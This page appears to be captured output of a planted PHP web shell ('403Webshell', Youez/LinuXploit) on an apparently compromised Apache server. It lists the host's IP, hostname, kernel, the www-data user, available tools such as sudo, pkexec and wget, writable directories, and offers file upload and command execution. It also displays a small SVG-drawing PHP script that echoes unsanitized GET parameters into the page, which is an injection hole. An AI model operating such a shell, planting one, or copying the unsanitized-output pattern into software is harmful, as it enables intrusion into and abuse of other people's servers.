403Webshell
Server IP : 93.86.61.54  /  Your IP : 216.73.216.60
Web Server : Apache/2.4.62 (Ubuntu)
System : Linux rasin.ddns.net 6.8.0-124-generic #124~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Tue May 26 21:05:19 UTC x86_64
User : www-data ( 33)
PHP Version : 8.4.22
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/html/projects/police/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/html/projects/police/crtez.php
<!DOCTYPE html>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<link rel='shortcut icon' type='image/png' href='favicon.png'/>
<title>Police</title>
</head
<body>
<div style="width:640px; word-wrap:break-word;">

<?php
/******************************
 Project: Srbija AMS 
 Version: 2018-12-21
 Author : M. Kukic
 Note   :  
******************************/

$usr = $_GET["usr"];
$rbr = $_GET["rbr"];
$a = $_GET["a"];
$b = $_GET["b"];
$kom = $_GET["kom"];
$mat = $_GET["mat"];
$kant = $_GET["kant"];


    // GRAPH Header

    echo "<svg xmlns='http://www.w3.org/2000/svg' version='1.1' width='640' height='480'>";
    echo "<rect width='640' height='480' fill='rgb(250,230,210)' stroke-width='1' stroke='rgb(0,0,0)' />";
    //
	echo "<g stroke='gray'>";  
    echo "<text x='20' y='15' font-size='12'>Police</text>";
	
	// X osa
	//echo "<line x1='10' y1='450' x2='630' y2='450'>"; 
	$x1=10;
	$y1=450;
	$x2=630;
	$y2=450;
	echo "<line x1='".$x1."' y1='".$y1."' x2='".$x2."' y2='".$y2."'/>n"; 
	
	$x1=10;
	$y1=10;
	$x2=10;
	$y2=450;
	echo "<line x1='".$x1."' y1='".$y1."' x2='".$x2."' y2='".$y2."'/>n"; 
	
	// crtice - podela koord sistema 
	for ($x=20; $x<640; $x=$x+20)
	{  
		$x1=$x;
		$y1=455;
		$x2=$x;
		$y2=445;
		echo "<line x1='".$x1."' y1='".$y1."' x2='".$x2."' y2='".$y2."'/>n"; 
    }
	
		for ($y=20; $y<480; $y=$y+20)
	{  
		$x1=6;
		$y1=$y;
		$x2=14;
		$y2=$y;
		echo "<line x1='".$x1."' y1='".$y1."' x2='".$x2."' y2='".$y2."'/>n"; 
    }
	
	// Parce
	$x0=20;
	$y0=20;
	$x1=$x0;
	$y1=$y0;
	$x2=$x0+$a;
	$y2=$y0;
	echo "<line x1='".$x1."' y1='".$y1."' x2='".$x2."' y2='".$y2."'/>n"; 
	
	$x1=$x2;
	$y1=$y2;
	$x2=$x0+$a;
	$y2=$y0+$b;
	echo "<line x1='".$x1."' y1='".$y1."' x2='".$x2."' y2='".$y2."'/>n"; 
	
	$x1=$x2;
	$y1=$y2;
	$x2=$x0;
	$y2=$y0+$b;
	echo "<line x1='".$x1."' y1='".$y1."' x2='".$x2."' y2='".$y2."'/>n"; 
	
	$x1=$x2;
	$y1=$y2;
	$x2=$x0;
	$y2=$y0;
	echo "<line x1='".$x1."' y1='".$y1."' x2='".$x2."' y2='".$y2."'/>n"; 
	
	echo "</g>";
  
   //
 
?>
<hr>
<a href="javascript:history.go(-1)"><img src="img/ret.png" border="0"></a>
</div>
</body>
</html>

Youez - 2016 - github.com/yon3zu
LinuXploit